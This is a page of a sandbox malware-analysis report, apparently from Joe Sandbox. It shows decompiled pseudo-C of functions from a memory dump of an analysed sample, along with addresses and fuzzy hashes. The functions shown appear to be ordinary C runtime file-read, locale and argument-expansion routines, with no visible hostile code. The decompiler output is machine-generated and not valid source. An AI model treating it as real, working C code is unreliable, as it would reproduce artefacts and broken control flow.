				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E0042C122(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E0042C135( *_t137))) = 9;
						L60:
						_t139 = E0042C00E();
						goto L61;
					}
					__eflags = _t198 -  *0x456d18; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x456b18 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E0042C122(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E0042C135(__eflags))) = 0x16;
								E0042C00E();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0042E2FC(_t154);
								E0042E2C2(0);
								E0042E2C2(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0043FE2E(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x456b18 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x456b18 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x456b18 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x456b18 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x456b18 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x456b18 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x456b18 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0043D0B3(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E0042C0FF(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E0042C135(__eflags))) = 9;
											 *(E0042C122(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x456b18 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00440982();
												} else {
													_t170 = E00440D0E();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00440BB7(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x456b18 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E0042C135(__eflags))) = 0xc;
									 *(E0042C122(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E0042E2C2(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x456b18 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E0042C122(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E0042C135(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E0042C122(_t246)) =  *_t197 & 0x00000000;
					_t139 = E0042C135(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x00440ea6
0x00440eaa
0x00440ead
0x00440ec7
0x00440ec9
0x0044122e
0x0044122e
0x00441233
0x00441233
0x0044123b
0x00441241
0x00441241
0x00000000
0x00441241
0x00440ecf
0x00440ed5
0x00000000
0x00000000
0x00440edf
0x00440ee5
0x00440ee8
0x00440eeb
0x00440ef5
0x00440ef8
0x00440efb
0x00440eff
0x00440f01
0x00000000
0x00000000
0x00440f07
0x00440f0a
0x00440f10
0x00440f2a
0x00440f2c
0x0044122a
0x00000000
0x0044122a
0x00440f32
0x00440f35
0x00000000
0x00000000
0x00440f3b
0x00440f3f
0x00000000
0x00000000
0x00440f45
0x00440f48
0x00440f4c
0x00440f53
0x00440f55
0x00440f55
0x00440f58
0x00440fad
0x00440faf
0x00440f75
0x00440f7a
0x00440f81
0x00440f87
0x00000000
0x00440fb1
0x00440fb3
0x00440fb4
0x00440fb6
0x00440fb9
0x00440fbb
0x00440fbd
0x00440fbf
0x00440fbf
0x00440fca
0x00440fcc
0x00440fd3
0x00440fd8
0x00440fdb
0x00440fde
0x00440fe0
0x00441004
0x0044100c
0x0044100f
0x00441016
0x0044101d
0x00441021
0x00441023
0x00441026
0x0044102d
0x0044102d
0x00441030
0x00441032
0x00441035
0x0044103a
0x0044103d
0x00441046
0x0044104a
0x0044104d
0x0044104f
0x00441055
0x00441057
0x00441060
0x00441061
0x00441063
0x00441067
0x00441068
0x0044106c
0x0044106f
0x00441079
0x0044107e
0x00441081
0x00441090
0x00441094
0x00441097
0x00441099
0x0044109b
0x0044109d
0x004410a2
0x004410a4
0x004410a8
0x004410a9
0x004410af
0x004410b9
0x004410ba
0x004410bd
0x004410c2
0x004410c5
0x004410d4
0x004410d8
0x004410db
0x004410dd
0x004410df
0x004410e1
0x004410e3
0x004410e9
0x004410e9
0x004410ea
0x004410f9
0x004410fc
0x004410fd
0x004410fd
0x004410e1
0x004410dd
0x004410c5
0x0044109d
0x00441099
0x00441081
0x00441057
0x0044104f
0x00441103
0x00441109
0x0044110b
0x0044117e
0x0044117e
0x00441182
0x00441192
0x00441198
0x0044119a
0x004411f6
0x004411f6
0x004411fe
0x004411ff
0x00441201
0x0044121a
0x0044121d
0x0044115a
0x0044115b
0x00000000
0x00441160
0x00441223
0x00000000
0x00441223
0x00441208
0x00441213
0x00000000
0x00441213
0x0044119c
0x0044119f
0x004411a2
0x00000000
0x00000000
0x004411a4
0x004411a4
0x004411a7
0x004411aa
0x004411ad
0x004411b4
0x004411b9
0x004411bb
0x004411bf
0x004411da
0x004411de
0x004411df
0x004411e2
0x004411e3
0x004411ef
0x004411e5
0x004411e5
0x004411e5
0x004411c1
0x004411c1
0x004411c1
0x004411cc
0x004411d1
0x004411d4
0x004411d4
0x00000000
0x004411b9
0x00441110
0x00441113
0x0044111a
0x0044111f
0x00000000
0x00000000
0x00441128
0x0044112e
0x00441130
0x00000000
0x00000000
0x00441132
0x00441136
0x00000000
0x00000000
0x0044114a
0x00441150
0x00441152
0x00441176
0x00441179
0x00000000
0x00441179
0x00441154
0x00000000
0x00440fe2
0x00440fe7
0x00440ff2
0x00441161
0x00441161
0x00441161
0x00441164
0x00441165
0x00000000
0x0044116d
0x00440fe0
0x00440faf
0x00440f5a
0x00440f5d
0x00440f71
0x00440f73
0x00440f94
0x00440f97
0x00440f9a
0x00440f9d
0x00000000
0x00440f9d
0x00000000
0x00440f5f
0x00440f5f
0x00440f62
0x00440f65
0x00000000
0x00440f65
0x00440f5d
0x00440f12
0x00440f17
0x00440f1f
0x00000000
0x00440eaf
0x00440eb4
0x00440eb7
0x00440ebc
0x00441246
0x00000000
0x00441246

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc67df045ca1ba53bf2d4281aaaf18b4c3858239b9a6cb67a5ed68e3cbe7aba
Instruction ID: 4541d978ce5c1b076b531205d360a62fb4e4a0042d97ffce767ba6bd2e014d4f
Opcode Fuzzy Hash: 8cc67df045ca1ba53bf2d4281aaaf18b4c3858239b9a6cb67a5ed68e3cbe7aba
Instruction Fuzzy Hash: 31C10570E04215AFEF11CF99D881BAEBBB1BF49304F00405AE541A73A2C7789D81CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00434CBD Relevance: 13.7, APIs: 9, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00434CBD(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t59;
				signed int _t68;
				signed int _t70;
				signed int _t73;
				signed int _t76;
				char _t81;
				intOrPtr* _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E00430BC8(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E0042E2FC(4);
						_t120 = 0;
						_v8 = _t125;
						E0042E2C2(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t52 =  *0x454980; // 0x4549d4
								 *_t93 = _t52;
								_t53 =  *0x454984; // 0x456e9c
								 *((intOrPtr*)(_t93 + 4)) = _t53;
								_t54 =  *0x454988; // 0x456e9c
								 *((intOrPtr*)(_t93 + 8)) = _t54;
								_t55 =  *0x4549b0; // 0x4549d8
								 *((intOrPtr*)(_t93 + 0x30)) = _t55;
								_t56 =  *0x4549b4; // 0x456ea0
								 *((intOrPtr*)(_t93 + 0x34)) = _t56;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E0042E2FC(4);
							_v12 = _t121;
							E0042E2C2(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_push(0xe);
								_push( *((intOrPtr*)(_t123 + 0xb0)));
								_push(1);
								_push( &_v24);
								_t68 = E0043DCA8(_t113);
								_t16 = _t93 + 4; // 0x4
								_t70 = E0043DCA8(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16);
								_t18 = _t93 + 8; // 0x8
								_t73 = E0043DCA8(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18);
								_t76 = E0043DCA8(_t113,  &_v24, 2, _t122, 0xe, _t93 + 0x30);
								_t22 = _t93 + 0x34; // 0x34
								if((E0043DCA8(_t113,  &_v24, 2, _t122, 0xf, _t22) | _t68 | _t70 | _t73 | _t76) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t81 =  *_t114;
										if(_t81 == 0) {
											break;
										}
										_t30 = _t81 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t81 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t82 = _t130 + 1;
												_t108 =  *_t82;
												 *_t130 = _t108;
												_t130 = _t82;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E00434C54(_t93);
								E0042E2C2(_t93);
								E0042E2C2(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E0042E2C2(_v8);
								return _v16;
							}
							E0042E2C2();
							goto L12;
						}
						E0042E2C2(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x454980;
					L21:
					_t59 =  *(_t123 + 0x80);
					if(_t59 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t59 | 0xffffffff) == 0) {
							E0042E2C2( *((intOrPtr*)(_t123 + 0x7c)));
							E0042E2C2( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x00434cbd
0x00434cc7
0x00434ccd
0x00434cd0
0x00434cd9
0x00434cf8
0x00434d00
0x00434d06
0x00434d19
0x00434d1a
0x00434d23
0x00434d25
0x00434d28
0x00434d2b
0x00434d34
0x00434d45
0x00434d47
0x00434d50
0x00434ea0
0x00434ea5
0x00434ea7
0x00434eac
0x00434eaf
0x00434eb4
0x00434eb7
0x00434ebc
0x00434ebf
0x00434ec4
0x00434e32
0x00434e38
0x00434e3c
0x00434e3e
0x00434e3e
0x00000000
0x00434e3c
0x00434d5d
0x00434d61
0x00434d64
0x00434d6b
0x00434d6e
0x00434d7b
0x00434d81
0x00434d87
0x00434d89
0x00434d8a
0x00434d8c
0x00434d8d
0x00434d92
0x00434da1
0x00434da8
0x00434db5
0x00434dc9
0x00434dd3
0x00434dea
0x00434e16
0x00434e26
0x00434e26
0x00434e2a
0x00000000
0x00000000
0x00434e1b
0x00434e1b
0x00434e21
0x00434e8d
0x00434e25
0x00434e25
0x00000000
0x00434e25
0x00434e8f
0x00434e91
0x00434e91
0x00434e94
0x00434e96
0x00434e98
0x00434e9a
0x00000000
0x00434e9e
0x00434e23
0x00000000
0x00434e23
0x00434e2c
0x00434e2f
0x00000000
0x00434e2f
0x00434ded
0x00434df3
0x00434dfb
0x00434e03
0x00434e07
0x00434e0b
0x00000000
0x00434e13
0x00434d70
0x00000000
0x00434d75
0x00434d37
0x00000000
0x00434d3f
0x00000000
0x00434ce3
0x00434ce3
0x00434ce5
0x00434ce8
0x00434e40
0x00434e40
0x00434e48
0x00434e4a
0x00434e4a
0x00434e52
0x00434e57
0x00434e5b
0x00434e60
0x00434e6b
0x00434e71
0x00434e5b
0x00434e75
0x00434e7a
0x00434e80
0x00000000
0x00434e80

APIs

_free.LIBCMT ref: 00434D2B
_free.LIBCMT ref: 00434D37
_free.LIBCMT ref: 00434E60
_free.LIBCMT ref: 00434E6B

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 95746e26bedfdf9b336a536f27cabea7c75172753d8588699ff9a7094c2af6a7
Instruction ID: d9a6ddf93cb2796ae79555da3c3dd3e42bcdd9b70e45092b89a7faf33f0bd9c2
Opcode Fuzzy Hash: 95746e26bedfdf9b336a536f27cabea7c75172753d8588699ff9a7094c2af6a7
Instruction Fuzzy Hash: 8C61D772900704DFD720DF75D842BABB7E8BF88720F11546BE5559B241EB74AD408B54

Uniqueness

Uniqueness Score: -1.00%

Function 00430E10 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00430E10(void* __esi, signed int _a4, signed int* _a8) {
				signed int _v0;
				intOrPtr _v4;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short _v18;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v56;
				signed int _v60;
				signed int _v68;
				signed int* _v72;
				signed int _v84;
				signed int* _v100;
				signed int _v112;
				intOrPtr* _v160;
				intOrPtr* _v200;
				intOrPtr* _v232;
				intOrPtr* _v236;
				intOrPtr _v240;
				signed int _v252;
				struct _WIN32_FIND_DATAW _v616;
				char _v617;
				intOrPtr* _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				signed int _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				signed int _v676;
				union _FINDEX_INFO_LEVELS _v680;
				union _FINDEX_INFO_LEVELS _v684;
				intOrPtr _v852;
				void* __ebx;
				void* __edi;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t242;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int _t254;
				signed int _t255;
				intOrPtr* _t266;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				signed int _t279;
				signed int _t281;
				signed int _t286;
				signed int _t289;
				char _t291;
				signed char _t292;
				signed int _t298;
				union _FINDEX_INFO_LEVELS _t302;
				signed int _t308;
				union _FINDEX_INFO_LEVELS _t311;
				intOrPtr* _t319;
				signed int _t322;
				intOrPtr _t327;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				intOrPtr _t344;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int* _t352;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t360;
				signed int* _t361;
				signed int _t364;
				signed int _t366;
				void* _t368;
				void* _t371;
				union _FINDEX_INFO_LEVELS _t372;
				void* _t373;
				signed int _t375;
				signed int* _t377;
				signed int* _t380;
				signed int _t382;
				signed int _t384;
				signed int _t387;
				signed int _t388;
				signed int _t390;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t402;
				intOrPtr* _t403;
				signed int _t405;
				void* _t407;
				intOrPtr* _t408;
				signed int _t411;
				intOrPtr* _t414;
				signed int _t419;
				signed int _t425;
				signed int _t427;
				intOrPtr* _t438;
				signed int _t441;
				short _t442;
				signed int _t447;
				intOrPtr* _t448;
				signed int _t456;
				signed int _t458;
				intOrPtr* _t459;
				signed int _t464;
				void* _t465;
				void* _t466;
				signed int _t468;
				signed int _t469;
				signed int _t472;
				signed int _t475;
				signed int _t477;
				signed int _t478;
				signed int _t480;
				intOrPtr _t481;
				void* _t482;
				signed int _t483;
				signed int* _t488;
				signed int _t489;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t495;
				signed int* _t496;
				signed int _t497;
				signed int _t499;
				signed int _t500;
				void* _t502;
				signed int _t503;
				void* _t504;
				intOrPtr _t505;
				void* _t506;
				signed int _t508;
				signed int _t513;
				void* _t514;
				void* _t515;
				signed int _t516;
				void* _t517;
				void* _t518;
				signed int _t519;
				void* _t520;
				void* _t521;
				void* _t522;
				signed int _t523;
				void* _t524;
				void* _t525;

				_t216 = _a8;
				_t518 = _t517 - 0x28;
				_push(__esi);
				_t529 = _t216;
				if(_t216 != 0) {
					_t488 = _a4;
					_t364 = 0;
					 *_t216 = 0;
					_t475 = 0;
					_t217 =  *_t488;
					_t380 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t217;
					if(_t217 == 0) {
						L9:
						_v8 = _t364;
						_t219 = _t380 - _t475;
						_t489 = _t475;
						_v12 = _t489;
						_t455 = (_t219 >> 2) + 1;
						_t221 = _t219 + 3 >> 2;
						__eflags = _t380 - _t489;
						_v16 = (_t219 >> 2) + 1;
						asm("sbb esi, esi");
						_t491 =  !_t489 & _t219 + 0x00000003 >> 0x00000002;
						__eflags = _t491;
						if(_t491 != 0) {
							_t355 = _t475;
							_t472 = _t364;
							do {
								_t448 =  *_t355;
								_t20 = _t448 + 1; // 0x1
								_v20 = _t20;
								do {
									_t357 =  *_t448;
									_t448 = _t448 + 1;
									__eflags = _t357;
								} while (_t357 != 0);
								_t364 = _t364 + 1 + _t448 - _v20;
								_t355 = _v12 + 4;
								_t472 = _t472 + 1;
								_v12 = _t355;
								__eflags = _t472 - _t491;
							} while (_t472 != _t491);
							_t455 = _v16;
							_v8 = _t364;
							_t364 = 0;
							__eflags = 0;
						}
						_t492 = E00427E52(_t221, _t455, _v8, 1);
						_t519 = _t518 + 0xc;
						__eflags = _t492;
						if(_t492 != 0) {
							_v12 = _t475;
							_t224 = _t492 + _v16 * 4;
							_t381 = _t224;
							_v28 = _t224;
							_t225 = _t475;
							_v16 = _t224;
							__eflags = _t225 - _v40;
							if(_t225 == _v40) {
								L24:
								_v12 = _t364;
								 *_a8 = _t492;
								_t493 = _t364;
								goto L25;
							} else {
								_t458 = _t492 - _t475;
								__eflags = _t458;
								_v32 = _t458;
								do {
									_t235 =  *_t225;
									_t459 = _t235;
									_v24 = _t235;
									_v20 = _t459 + 1;
									do {
										_t237 =  *_t459;
										_t459 = _t459 + 1;
										__eflags = _t237;
									} while (_t237 != 0);
									_t460 = _t459 - _v20;
									_t238 = _t459 - _v20 + 1;
									_push(_t238);
									_v20 = _t238;
									_t242 = E0043D737(_t381, _v28 - _t381 + _v8, _v24);
									_t519 = _t519 + 0x10;
									__eflags = _t242;
									if(_t242 != 0) {
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										E0042C03B();
										asm("int3");
										_t513 = _t519;
										_t520 = _t519 - 0x34;
										_t244 =  *0x454264; // 0x8c4320d5
										_v84 = _t244 ^ _t513;
										_t246 = _v68;
										_v112 = _t246;
										_push(_t492);
										_t496 = _v72;
										_v100 = _t496;
										__eflags = _t246;
										if(__eflags != 0) {
											_push(_t364);
											_push(_t475);
											_t477 = 0;
											 *_t246 = 0;
											_t366 = 0;
											_t247 =  *_t496;
											_t387 = 0;
											_v616.cAlternateFileName = 0;
											_v48 = 0;
											_v44 = 0;
											__eflags = _t247;
											if(_t247 == 0) {
												L42:
												_v24 = _t477;
												_t249 = _t387 - _t366;
												_t497 = _t366;
												_v28 = _t497;
												_t463 = (_t249 >> 2) + 1;
												_t251 = _t249 + 3 >> 2;
												__eflags = _t387 - _t497;
												_v36 = (_t249 >> 2) + 1;
												asm("sbb esi, esi");
												_t499 =  !_t497 & _t249 + 0x00000003 >> 0x00000002;
												__eflags = _t499;
												if(_t499 != 0) {
													_t342 = _t366;
													_t469 = _t477;
													do {
														_t438 =  *_t342;
														_t87 = _t438 + 2; // 0x2
														_v32 = _t87;
														do {
															_t344 =  *_t438;
															_t438 = _t438 + 2;
															__eflags = _t344 - _t477;
														} while (_t344 != _t477);
														_v24 = _v24 + 1 + (_t438 - _v32 >> 1);
														_t342 = _v28 + 4;
														_t469 = _t469 + 1;
														_v28 = _t342;
														__eflags = _t469 - _t499;
													} while (_t469 != _t499);
													_t463 = _v36;
												}
												_t500 = E00427E52(_t251, _t463, _v24, 2);
												_t521 = _t520 + 0xc;
												__eflags = _t500;
												if(_t500 != 0) {
													_v28 = _t366;
													_t254 = _t500 + _v36 * 4;
													_t464 = _t254;
													_v60 = _t254;
													_t255 = _t366;
													_v36 = _t464;
													__eflags = _t255 - _v48;
													if(_t255 == _v48) {
														L57:
														_v24 = _t477;
														 *_v40 = _t500;
														_t501 = _t477;
														goto L58;
													} else {
														_t396 = _t500 - _t366;
														__eflags = _t396;
														_v20 = _t396;
														do {
															_t266 =  *_t255;
															_t397 = _t266;
															_v56 = _t266;
															_v32 = _t397 + 2;
															do {
																_t268 =  *_t397;
																_t397 = _t397 + 2;
																__eflags = _t268 - _t477;
															} while (_t268 != _t477);
															_t269 = (_t397 - _v32 >> 1) + 1;
															_push(_t269);
															_v32 = _t269;
															_t402 = _t464 - _v60 >> 1;
															_t272 = E00430A09(_t464, _v24 - _t402, _v56);
															_t521 = _t521 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																_push(_t477);
																_push(_t477);
																_push(_t477);
																_push(_t477);
																_push(_t477);
																E0042C03B();
																asm("int3");
																_push(_t513);
																_t514 = _t521;
																_push(_t402);
																_t403 = _v160;
																_t136 = _t403 + 1; // 0x1
																_t465 = _t136;
																do {
																	_t274 =  *_t403;
																	_t403 = _t403 + 1;
																	__eflags = _t274;
																} while (_t274 != 0);
																_push(_t477);
																_t478 = _a4;
																_t405 = _t403 - _t465 + 1;
																_v16 = _t405;
																__eflags = _t405 -  !_t478;
																if(_t405 <=  !_t478) {
																	_push(_t366);
																	_t139 = _t478 + 1; // 0x1
																	_t368 = _t139 + _t405;
																	_t504 = E00430BC8(_t368, 1);
																	_t407 = _t500;
																	__eflags = _t478;
																	if(_t478 == 0) {
																		L73:
																		_push(_v16);
																		_t368 = _t368 - _t478;
